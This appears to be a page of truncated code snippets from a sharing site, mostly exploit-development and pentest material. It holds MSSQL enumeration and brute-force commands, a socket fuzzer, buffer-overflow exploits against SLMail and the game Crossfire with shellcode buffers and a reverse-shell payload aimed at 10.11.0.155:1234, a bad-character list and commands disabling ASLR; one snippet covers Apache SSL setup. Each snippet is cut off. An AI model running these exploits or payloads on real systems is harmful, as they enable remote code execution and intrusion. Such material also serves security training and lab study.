[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanne...
Score: 0
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available crea...
Score: 0
#!/usr/bin/python
import socket
#create an array of buffers, while incrementing them
buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_S...
Score: 0
#!/usr/bin/env ruby
=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shitaka_ga_nai
=end
require 'socket'
#bad chars = "\x00\x0a\x0d"
#jmp esp addre...
Score: 0
prefix = "\\x41" * 80
eip = "\\x42" * 4
nop = "\\x90" * (400 - 137)
buf = ""
buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31"
buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68"
buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\x...
Score: 0
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = "\x41" * 4379
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
...
Score: 0
#!/usr/bin/env ruby
=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end
require 'socket'
#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"
#add eax, 12 = 83C00C
#jmp eax = FFE0
#create shellcode
#creates a bi...
Score: 0
cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c...
Score: 0
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...
Score: 0
There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many technique...
Score: 0